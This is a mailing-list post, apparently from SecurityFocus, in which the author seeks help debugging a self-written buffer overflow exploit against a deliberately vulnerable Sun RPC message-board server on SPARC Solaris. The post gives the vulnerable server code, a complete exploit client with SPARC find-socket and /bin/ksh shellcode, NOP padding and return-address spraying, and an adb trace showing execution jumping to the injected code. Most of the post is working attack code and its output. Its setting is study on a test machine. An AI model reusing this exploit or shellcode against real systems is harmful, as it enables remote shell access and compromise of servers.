('binary' encoding is not supported, stored as-is) Mailer: SecurityFocus Thanks all the kind people for valuable response. Here let me put my source code and some debugging process to see whether you guys can find out the problem: Also some notes first: 1.For Golden_Eternity: To make sure the debugged process have similiar address map, I use adb to attach the running process rather than launch process from adb. 2. For the debugging process followed, I got a SIGSEGV in adb. But I do get a interactive shell from client side the other days.In that case, I was able to run "ls, pwd....", but the server closed the hijacked sock file descriptor when I try to "more /etc/passwd" 3. For Dave Aitel: If I run the server freely without adb or truss, the server doesn't crash with SIGSEGV, nor spawn a shell. That's what I mean it seem to skip the hacking code 4. For dotslashat_private, I will post truss output in another thread, I am afraid this one is too long ================================ RPC interface file msg.x const MAXLEN=512; typedef string svrmsg<MAXLEN>; typedef char len_val<MAXLEN>; typedef len_val fromName; typedef len_val toName; typedef len_val MSG; struct username_msg { fromName fromname; toName toname; MSG msg; } ; program MSGBOARD_PROG { version MSGBOARD_VERSION { svrmsg makemsg(username_msg)=1; } = 1; } = 200000089; ==================================== The vulnerable RPC server: #include "msg.h" #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <unistd.h> int dynMemSize=1536; extern int errno; void backup(char*, int); void inbackup(char*, int); svrmsg * makemsg_1(username_msg* un_msg, struct svc_req *req) { static svrmsg smsg; char *backmsg; int fromInt, toInt, msgInt; if(smsg!=NULL) free(smsg); fromInt=un_msg->fromname.len_val_len; toInt=un_msg->toname.len_val_len; msgInt=un_msg->msg.len_val_len; backmsg=malloc(dynMemSize); memset(backmsg,'\x00', dynMemSize); /*Client takes sometime to transmit the msg*/ sleep(5); /*Can't use strcpy cuz heap address contain \x00*/ memcpy(backmsg, un_msg- >fromname.len_val_val, fromInt); memcpy((char*)backmsg+fromInt, " said to ", 12); memcpy((char*)backmsg+fromInt+12, un_msg- >toname.len_val_val, toInt); memcpy((char*) backmsg+fromInt+toInt+12, "==> ", 4); memcpy((char*)backmsg+fromInt+toInt+16, un_msg->msg.len_val_val, msgInt); /*Here call the vulnerable func*/ backup(un_msg->fromname.len_val_val, fromInt); smsg=&backmsg[0]; return (&smsg); } void backup(char* bkFromName, int nmlen) { inbackup(bkFromName, nmlen); } void inbackup(char *bkFromName, int nmlen) { char tempDir[12]; memcpy(tempDir,bkFromName, nmlen); } ====================================== ======= The hacking client #include "msg.h" #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <netdb.h> #include <unistd.h> char findsckcode[]= "\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */ "\x20\xbf\xff\xff" /* bn,a <findsckcode> */ "\x7f\xff\xff\xff" /* call <findsckcode+4> */ "\x33\x02\x12\x34" "\xa0\x10\x20\xff" /* mov 0xff,%l0 */ "\xa2\x10\x20\x54" /* mov 0x54,%l1 */ "\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */ "\xaa\x03\xe0\x28" /* add %o7,40,%l5 */ "\x81\xc5\x60\x08" /* jmp %l5+8 */ "\xc0\x2b\xe0\x04" /* stb %g0,[%o7+4] */ "\xe6\x03\xff\xd0" /* ld [%o7-48],%l3 */ "\xe8\x03\xe0\x04" /* ld [%o7+4],%l4 */ "\xa8\xa4\xc0\x14" /* subcc %l3,%l4,%l4 */ "\x02\xbf\xff\xfb" /* bz <findsckcode+32> */ "\xaa\x03\xe0\x5c" /* add %o7,92,%l5 */ "\xe2\x23\xff\xc4" /* st %l1,[%o7-60] */ "\xe2\x23\xff\xc8" /* st %l1,[%o7-56] */ "\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */ "\x90\x04\x20\x01" /* add %l0,1,%o0 */ "\xa7\x2c\x60\x08" /* sll %l1,8,%l3 */ "\x92\x14\xe0\x91" /* or %l3,0x91,%o1 */ "\x94\x03\xff\xc4" /* add %o7,-60,%o2 */ "\x82\x10\x20\x36" /* mov 0x36,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "\x1a\xbf\xff\xf1" /* bcc <findsckcode+36> */ "\xa0\xa4\x20\x01" /* deccc %l0 */ "\x12\xbf\xff\xf5" /* bne <findsckcode+60> */ "\xa6\x10\x20\x03" /* mov 0x03,%l3 */ "\x90\x04\x20\x02" /* add %l0,2,%o0 */ "\x92\x10\x20\x09" /* mov 0x09,%o1 */ "\x94\x04\xff\xff" /* add %l3,-1,%o2 */ "\x82\x10\x20\x3e" /* mov 0x3e,%g1 */ "\xa6\x84\xff\xff" /* addcc %l3,-1,%l3 */ "\x12\xbf\xff\xfb" /* bne <findsckcode+112> */ "\x91\xd0\x20\x08" /* ta 8 */ ; char shellcode[]= "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */ "\x20\xbf\xff\xff" /* bn,a <shellcode> */ "\x7f\xff\xff\xff" /* call <shellcode+4> */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; static char nop[]="\x80\x1c\x40\x11"; extern int errno; static struct timeval TIMEOUT = { 25, 0 }; /*The xdr_req will replace normal rpc client request-- (xdrproc_t) xdr_svrmsg*/ bool_t xdr_req(XDR *xdrs,username_msg *objp){ if(!xdr_array(xdrs,&objp- >fromname.len_val_val,&objp- >fromname.len_val_len,~0,sizeof(char), (xdrproc_t) xdr_char)) return(FALSE); if(!xdr_array(xdrs,&objp- >toname.len_val_val,&objp- >toname.len_val_len,~0,sizeof(char), (xdrproc_t) xdr_char)) return(FALSE); if(!xdr_array(xdrs,&objp->msg.len_val_val,&objp- >msg.len_val_len,~0,sizeof(char), (xdrproc_t) xdr_char)) return(FALSE); return(TRUE); } main(int argc, char *argv[]) { CLIENT *clnt; char address[4]; char *b0, *b1, *b2, *b3; char buffer[2048]; username_msg umsg; svrmsg *result; int sck, n, i, port=0; enum clnt_stat stat; struct hostent *hp; struct sockaddr_in adr; if (argc != 2) { fprintf(stderr, "usage: %s host \n",argv[0]); exit(1); } adr.sin_family=AF_INET; adr.sin_port=htons(port); if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if((hp=gethostbyname(argv[1]))==NULL){ errno=EADDRNOTAVAIL;perror("error");exit(- 1); } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } /*create a RPC session based on tcp, */ */ sck=RPC_ANYSOCK; clnt = clnttcp_create(&adr, MSGBOARD_PROG, MSGBOARD_VERSION, &sck,0,0); if (clnt == (CLIENT *)NULL) { clnt_pcreateerror("error"); exit(1); } i=sizeof(struct sockaddr_in); if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1) { struct{unsigned int maxlen;unsigned int len;char *buf;}nb; ioctl(sck,(('S'<<8)|2),"sockmod"); nb.maxlen=0xffff; nb.len=sizeof(struct sockaddr_in);; nb.buf=(char*)&adr; ioctl(sck,(('T'<<8)|144),&nb); } n=ntohs(adr.sin_port); printf("port=%d connected! \n",n);fflush(stdout); sleep(3); findsckcode[12+2]=(unsigned char)((n&0xff00)>>8); findsckcode[12+3]=(unsigned char)(n&0xff); *(unsigned int*)address=0x6dc80; *(unsigned int*)address=htonl(*(unsigned int*) address); b0=&buffer[0]; b1=&buffer[0]; for(i=0;i<252;i++) *b1++=address[i%4]; for(i=0;i<4;i++) *b1++=0; b2=&buffer[256]; for(i=256;i<508;i++) *b2++=address[i%4]; for(i=0;i<4;i++) *b2++=0; b3=&buffer[512]; for(i=0;i<256;i++) *b3++=nop[i%4]; for(i=0;i<strlen(findsckcode);i++) *b3++=findsckcode[i]; for(i=0;i<strlen(shellcode);i++) *b3++=shellcode[i]; *b3=0; /*refer to xdr_array function and msg.x to see how xdr conversion goes*/ umsg.fromname.len_val_len=252; umsg.fromname.len_val_val=b0; umsg.toname.len_val_len=252; umsg.toname.len_val_val=b1; umsg.msg.len_val_len=456; umsg.msg.len_val_val=b2; stat = clnt_call(clnt, makemsg , (xdrproc_t) xdr_req, (caddr_t) &umsg, xdr_void , NULL, TIMEOUT); if (stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);} printf("sent!\n"); write(sck,"/bin/uname -a\n",14); while(1){ fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sck,&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&fds)){ if((cnt=read(0,buf,1024))<1){ if (errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sck,buf,cnt); } if(FD_ISSET(sck,&fds)){ if((cnt=read(sck,buf,1024))<1){ if (errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } } ============================ ==> list the name list first testbox:/home/minchumo nm -x msg_svc msg_svc: [Index] Value Size Type Bind Other Shndx Name [26] |0x00000000|0x00000000|SECT |LOCL |0 |25 | [2] |0x000100d4|0x00000000|SECT |LOCL |0 |1 | [3] |0x000100e8|0x00000000|SECT |LOCL |0 |2 | [4] |0x000103c4|0x00000000|SECT |LOCL |0 |3 | [5] |0x000109e4|0x00000000|SECT |LOCL |0 |4 | [6] |0x00010d10|0x00000000|SECT |LOCL |0 |5 | [7] |0x00010d50|0x00000000|SECT |LOCL |0 |6 | [8] |0x00010d80|0x00000000|SECT |LOCL |0 |7 | [9] |0x00010d8c|0x00000000|SECT |LOCL |0 |8 | [10] |0x00010f40|0x00000000|SECT |LOCL |0 |9 | [11] |0x00011b20|0x00000000|SECT |LOCL |0 |10 | [12] |0x00011b70|0x00000000|SECT |LOCL |0 |11 | [13] |0x00011bc0|0x00000000|SECT |LOCL |0 |12 | [14] |0x00011bc4|0x00000000|SECT |LOCL |0 |13 | [15] |0x00011bc8|0x00000000|SECT |LOCL |0 |14 | [16] |0x00021c14|0x00000000|SECT |LOCL |0 |15 | [17] |0x00021c18|0x00000000|SECT |LOCL |0 |16 | [18] |0x00021dfc|0x00000000|SECT |LOCL |0 |17 | [19] |0x00021ebc|0x00000000|SECT |LOCL |0 |18 | [20] |0x00021ee8|0x00000000|SECT |LOCL |0 |19 | [21] |0x00021f1c|0x00000000|SECT |LOCL |0 |20 | [22] |0x00021ffc|0x00000000|SECT |LOCL |0 |21 | [23] |0x00000000|0x00000000|SECT |LOCL |0 |22 | [24] |0x00000000|0x00000000|SECT |LOCL |0 |23 | [25] |0x00000000|0x00000000|SECT |LOCL |0 |24 | [27] |0x00000000|0x00000000|SECT |LOCL |0 |26 | [28] |0x00000000|0x00000000|SECT |LOCL |0 |27 | [82] |0x00021dfc|0x00000000|OBJT |GLOB |0 |17 |_DYNAMIC [30] |0x00022010|0x00000000|OBJT |LOCL |0 |21 |_END_ [62] |0x00021c14|0x00000000|OBJT |GLOB |0 |15 |_GLOBAL_OFFSET_TABLE_ [105] |0x00021c18|0x00000000|OBJT |GLOB |0 |16 |_PROCEDURE_LINKAGE_TABLE_ [29] |0x00010000|0x00000000|OBJT |LOCL |0 |1 |_START_ [51] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |__1cH__CimplKcplus_fini6F_v_ [119] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |__1cH__CimplKcplus_init6F_v_ [78] |0x00021f0c|0x00000004|OBJT |GLOB |0 |19 |___Argv [93] |0x00021f08|0x00000004|OBJT |GLOB |0 |19 |__cg92_used [36] |0x00021f04|0x00000004|OBJT |LOCL |0 |19 |__crt_scratch [117] |0x00021ee8|0x00000018|OBJT |GLOB |0 |19 |__environ_lock [107] |0x00000000|0x00000000|NOTY |GLOB |0 |ABS |__fsr_init_value [104] |0x00021ff9|0x00000000|OBJT |GLOB |0 |20 |_edata [58] |0x00022010|0x00000000|OBJT |GLOB |0 |21 |_end [57] |0x00021f00|0x00000004|OBJT |GLOB |0 |19 |_environ [109] |0x00011c14|0x00000000|OBJT |GLOB |0 |14 |_etext [90] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |_ex_deregister [33] |0x00011bc0|0x00000000|NOTY |LOCL |0 |12 |_ex_range0 [49] |0x00011bc0|0x00000000|NOTY |LOCL |0 |12 |_ex_range1 [61] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |_ex_register [32] |0x00021ecc|0x00000000|NOTY |LOCL |0 |18 |_ex_shared0 [48] |0x00021edc|0x00000000|NOTY |LOCL |0 |18 |_ex_shared1 [34] |0x00010f40|0x00000000|NOTY |LOCL |0 |9 |_ex_text0 [50] |0x00011b20|0x00000000|NOTY |LOCL |0 |9 |_ex_text1 [88] |0x00021c60|0x00000000|FUNC |GLOB |0 |UNDEF |_exit [118] |0x00011b70|0x00000050|FUNC |GLOB |0 |11 |_fini [73] |0x00011b20|0x00000050|FUNC |GLOB |0 |10 |_init [110] |0x00011bc4|0x00000004|OBJT |GLOB |0 |13 |_lib_version [42] |0x000111f8|0x00000024|FUNC |LOCL |0 |9 |_msgout [45] |0x00022000|0x00000004|OBJT |LOCL |0 |21 |_rpcpmstart [41] |0x00021f18|0x00000004|OBJT |LOCL |0 |19 |_rpcsvccount [40] |0x00021f14|0x00000004|OBJT |LOCL |0 |19 |_rpcsvcstate [52] |0x00010f40|0x000000d0|FUNC |GLOB |0 |9 |_start [69] |0x00021cc0|0x00000000|FUNC |GLOB |0 |UNDEF |alarm [67] |0x00021c48|0x00000000|FUNC |GLOB |0 |UNDEF |atexit [60] |0x00011180|0x00000028|FUNC |GLOB |0 |9 |backup [97] |0x00021d98|0x00000000|FUNC |GLOB |0 |UNDEF |close [43] |0x00011230|0x00000118|FUNC |LOCL |0 |9 |closedown [35] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |crt1.s [31] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |crti.s [47] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |crtn.s [80] |0x00021db0|0x00000000|FUNC |GLOB |0 |UNDEF |dup2 [112] |0x00021f10|0x00000004|OBJT |GLOB |0 |19 |dynMemSize [91] |0x00021f00|0x00000004|OBJT |WEAK |0 |19 |environ [68] |0x00021c54|0x00000000|FUNC |GLOB |0 |UNDEF |exit [59] |0x00021d74|0x00000000|FUNC |GLOB |0 |UNDEF |fork [96] |0x00021c6c|0x00000000|FUNC |GLOB |0 |UNDEF |free [76] |0x00021d50|0x00000000|FUNC |GLOB |0 |UNDEF |freenetconfigent [79] |0x00021d2c|0x00000000|FUNC |GLOB |0 |UNDEF |getenv [71] |0x00021d38|0x00000000|FUNC |GLOB |0 |UNDEF |getnetconfigent [100] |0x00021d8c|0x00000000|FUNC |GLOB |0 |UNDEF |getrlimit [103] |0x000111b8|0x0000002c|FUNC |GLOB |0 |9 |inbackup [113] |0x00011570|0x00000334|FUNC |GLOB |0 |9 |main [56] |0x00011020|0x0000014c|FUNC |GLOB |0 |9 |makemsg_1 [72] |0x00021c78|0x00000000|FUNC |GLOB |0 |UNDEF |malloc [116] |0x00021c9c|0x00000000|FUNC |GLOB |0 |UNDEF |memcpy [106] |0x00021c84|0x00000000|FUNC |GLOB |0 |UNDEF |memset [38] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_proc.c [1] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_svc [39] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_svc.c [46] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_xdr.c [44] |0x00011358|0x00000204|FUNC |LOCL |0 |9 |msgboard_prog_1 [99] |0x00021da4|0x00000000|FUNC |GLOB |0 |UNDEF |open [70] |0x00021d20|0x00000000|FUNC |GLOB |0 |UNDEF |openlog [92] |0x00021d80|0x00000000|FUNC |GLOB |0 |UNDEF |perror [87] |0x00021dbc|0x00000000|FUNC |GLOB |0 |UNDEF |setsid [65] |0x00021cb4|0x00000000|FUNC |GLOB |0 |UNDEF |signal [86] |0x00021d08|0x00000000|FUNC |GLOB |0 |UNDEF |sigset [64] |0x00021c90|0x00000000|FUNC |GLOB |0 |UNDEF |sleep [81] |0x00021dc8|0x00000000|FUNC |GLOB |0 |UNDEF |svc_create [84] |0x00022008|0x00000004|OBJT |GLOB |0 |21 |svc_max_pollfd [120] |0x0002200c|0x00000004|OBJT |GLOB |0 |21 |svc_pollfd [83] |0x00021d5c|0x00000000|FUNC |GLOB |0 |UNDEF |svc_reg [101] |0x00021d68|0x00000000|FUNC |GLOB |0 |UNDEF |svc_run [75] |0x00021cd8|0x00000000|FUNC |GLOB |0 |UNDEF |svc_sendreply [89] |0x00021d44|0x00000000|FUNC |GLOB |0 |UNDEF |svc_tli_create [74] |0x00021cf0|0x00000000|FUNC |GLOB |0 |UNDEF |svcerr_decode [85] |0x00021ce4|0x00000000|FUNC |GLOB |0 |UNDEF |svcerr_noproc [66] |0x00021cfc|0x00000000|FUNC |GLOB |0 |UNDEF |svcerr_systemerr [114] |0x00021ca8|0x00000000|FUNC |GLOB |0 |UNDEF |syslog [55] |0x00022004|0x00000004|OBJT |GLOB |0 |21 |t_errno [54] |0x00021d14|0x00000000|FUNC |GLOB |0 |UNDEF |t_getstate [37] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |values-Xa.c [102] |0x00011a30|0x00000044|FUNC |GLOB |0 |9 |xdr_MSG [94] |0x00021dec|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_array [98] |0x00021de0|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_char [111] |0x00011980|0x00000044|FUNC |GLOB |0 |9 |xdr_fromName [63] |0x00011910|0x0000005c|FUNC |GLOB |0 |9 |xdr_len_val [115] |0x00021dd4|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_string [77] |0x000118b8|0x00000048|FUNC |GLOB |0 |9 |xdr_svrmsg [95] |0x000119d8|0x00000044|FUNC |GLOB |0 |9 |xdr_toName [108] |0x00011a88|0x00000094|FUNC |GLOB |0 |9 |xdr_username_msg [53] |0x00021ccc|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_void testbox:/home/minchumo ============================ Experiment Log ==>Normal usage of the RPC Service testbox:/home/minchumo rmsg testbox dog cat hi dog said to cat==> hi testbox:/home/minchumo ===>Exploitation: 0. Run server msg_svc 1. First several normal executions of RPC server as above. 2. Run hacking code 3. Interact as following ==>Client side testbox:/home/minchumo rmsge testbox port=59985 connected! sent! ===>Server side testbox:/home/minchumo r ps ps -ef | grep msg minchumo 6928 6142 0 10:26:30 pts/4 0:00 grep msg minchumo 6924 1 0 10:25:46 ? 0:00 msg_svc testbox:/home/minchumo adb 0t6924:A process 6924 stopped at: _poll+4: ta 0x8 /*stop at entry point makemsg_1*/ makemsg_1:b :c breakpoint at: makemsg_1: save %sp, -0x78, %sp :s stopped at: makemsg_1+4: st %i1, [%fp + 0x48] :s stopped at: makemsg_1+8: st %i0, [%fp + 0x44] :S stopped at: makemsg_1+0xc: sethi %hi(0x21c00), %l0 :s stopped at: makemsg_1+0x10: ld [%l0 + 0x3fc], %l0 :s stopped at: makemsg_1+0x14: cmp %l0, %g0 :s stopped at: makemsg_1+0x18: be makemsg_1+0x2c :s stopped at: makemsg_1+0x1c: nop :s stopped at: makemsg_1+0x20: sethi %hi(0x21c00), %l0 :s stopped at: /*This is call to function free, since we have normal client request before The dynamic memory was allocated and need to be freed*/ makemsg_1+0x24: call 0x21c6c :s stopped at: makemsg_1+0x28: ld [%l0 + 0x3fc], %o0 :s stopped at: 21c6c: sethi %hi(0x15000), %g1 :s stopped at: 21c70: sethi %hi(0xff1c6400), %g1 $r g0 0 l0 21c00 g1 15000 xdr_username_msg+0x3578 l1 0 g2 0 l2 0 g3 0 l3 0 g4 0 l4 0 g5 0 l5 0 g6 0 l6 0 g7 0 l7 0 o0 6da58 i0 ffbeee48 o1 0 i1 24808 _rpcpmstart+0x2808 o2 0 i2 ffbeee48 o3 0 i3 66f00 o4 0 i4 ff311c8c o5 0 i5 ffbeee61 sp ffbeed60 fp ffbeedd8 o7 11044 makemsg_1+0x24 i7 114ac msgboard_prog_1+0x154 y 0 tstate: 82001a07 (ccr=0x0, asi=0x82, pstate=0x1a, cwp=0x7) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 21c70 21c70: sethi %hi(0xff1c6400), % g1 npc 21c74 21c74: jmp %g1 + 0x14c /*The address 6da58 point to server response for last client request This dynamic memory will be free*/ 6da58/4X 6da58: 646f6720 20736169 64202074 6f202063 6da58/S 6da58: dog said to cat==> hi memset:b :c breakpoint at: memset: mov %o0, %o5 $r g0 0 l0 21f10 dynMemSize g1 1e000 l1 ffbeee48 g2 0 l2 0 g3 0 l3 0 g4 0 l4 0 g5 0 l5 0 g6 0 l6 0 g7 0 l7 0 o0 6da58 i0 ffbeee48 o1 0 i1 24808 _rpcpmstart+0x2808 o2 600 i2 ffbeee48 o3 0 i3 66f00 o4 ff235ad4 i4 ff311c8c o5 11044 makemsg_1+0x24 i5 ffbeee61 sp ffbeed60 fp ffbeedd8 o7 11080 makemsg_1+0x60 i7 114ac msgboard_prog_1+0x154 y 0 tstate: 82001a04 (ccr=0x0, asi=0x82, pstate=0x1a, cwp=0x4) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc ff33190c memset: mov %o0, %o5 npc ff331910 _memset+4: cmp %o2, 0x10 memcpy:b :c /* encounter the alarm for sleep after 5 sec. the server is waken We now know the adb will receive system call for signal handleing*/ SIGALRM: Alarm Clock stopped at: _sigsuspend+4: ta 0x8 :c /*The following are five memcpy which move client request to dynamic allocated memory address*/ breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: memcpy: mov %o0, %o5 backup:b :c breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: backup: save %sp, -0x60, %sp :s stopped at: backup+4: st %i1, [%fp + 0x48] $r g0 0 l0 0 g1 676a8 l1 0 g2 0 l2 0 g3 0 l3 0 g4 0 l4 0 g5 0 l5 0 g6 0 l6 0 g7 0 l7 0 o0 0 i0 67470 o1 0 i1 fc o2 0 i2 0 o3 0 i3 0 o4 0 i4 0 o5 0 i5 6dc60 sp ffbeed00 fp ffbeed60 o7 0 i7 11138 makemsg_1+0x118 y 0 tstate: 4482001a06 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x6) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 11184 backup+4: st %i1, [%fp + 0x48] npc 11188 backup+8: st %i0, [%fp + 0x44] /*After 5 memcpy, we can inspect the dyn. memory to see whether request was copied intact, and they seem to be good as following*/ 6da58/40X 6da58: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6daf8: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 20207361 69642020 746f2020 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6db98: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc38: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 3d3d3e20 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 6dcd8: 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 20bfffff 20bfffff 7fffffff 3302ea51 a01020ff a2102054 6dd78: a403ffd0 aa03e028 81c56008 c02be004 e603ffd0 e803e004 a8a4c014 2bffffb aa03e05c e223ffc4 e223ffc8 e423ffcc 90042001 a72c6008 9214e091 9403ffc4 82102036 91d02008 1abffff1 a0a42001 12bffff5 a6102003 90042002 92102009 9404ffff 8210203e a684ffff 12bffffb 91d02008 20bfffff 20bfffff 7fffffff 9003e020 92022010 c0222008 d0222010 c0222014 8210200b 91d02008 2f62696e 6de18: 2f6b7368 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 backup+4/i /*Now call into vulerable function to overflow and jump to heap*/ backup+4: st %i1, [%fp + 0x48] :S stopped at: backup+8: st %i0, [%fp + 0x44] :s stopped at: backup+0xc: or %i0, %g0, %o0 :s stopped at: backup+0x10: call inbackup :s stopped at: backup+0x14: or %i1, %g0, %o1 :s stopped at: inbackup: save %sp, -0x70, %sp :s stopped at: inbackup+4: st %i1, [%fp + 0x48] :S stopped at: inbackup+8: st %i0, [%fp + 0x44] :s stopped at: inbackup+0xc: add %fp, -0xc, %o0 :s stopped at: inbackup+0x10: or %i0, %g0, %o1 :s stopped at: inbackup+0x14: call 0x21c9c :s stopped at: inbackup+0x18: or %i1, %g0, %o2 :s stopped at: 21c9c: sethi %hi(0x21000), %g1 inbackup+0x1c:b :c breakpoint at: memcpy: mov %o0, %o5 :s stopped at: forcpy+4: cmp %o2, 0x20 :s stopped at: forcpy+8: ??? :c breakpoint at: inbackup+0x1c: ret :s stopped at: inbackup+0x20: restore :s stopped at: backup+0x18: ret :s stopped at: backup+0x1c: restore :s stopped at: /*Now process controll was transmitted to heap*/ 6dc88: xor %l1, %l1, %g0 $r g0 0 l0 801c4011 g1 67568 l1 801c4011 g2 0 l2 801c4011 g3 0 l3 801c4011 g4 0 l4 801c4011 g5 0 l5 801c4011 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 6dc80 i0 801c4011 o1 6dc80 i1 801c4011 o2 6dc80 i2 801c4011 o3 6dc80 i3 801c4011 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dc80 i7 801c4011 y 0 tstate: 4482001a01 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x1) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6dc88 6dc88: xor %l1, %l1, %g0 npc 6dc8c 6dc8c: xor %l1, %l1, %g0 .,40/i 6dc8c: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 bn,a 0x6dd5c bn,a 0x6dd60 call 0x6dd64 sethi %hi(0xba94400), %i1 mov 0xff, %l0 mov 0x54, %l1 add %o7, -0x30, %l2 add %o7, 0x28, %l5 jmp %l5 + 0x8 stb %g0, [%o7 + 0x4] ld [%o7 - 0x30], %l3 .,20/i 6dd88: ld [%o7 - 0x30], %l3 ld [%o7 + 0x4], %l4 subcc %l3, %l4, %l4 be 0x6dd80 add %o7, 0x5c, %l5 st %l1, [%o7 - 0x3c] st %l1, [%o7 - 0x38] st %l2, [%o7 - 0x34] add %l0, 0x1, %o0 sll %l1, 0x8, %l3 or %l3, 0x91, %o1 add %o7, -0x3c, %o2 mov 0x36, %g1 ta 0x8 bgeu 0x6dd84 subcc %l0, 0x1, %l0 bne 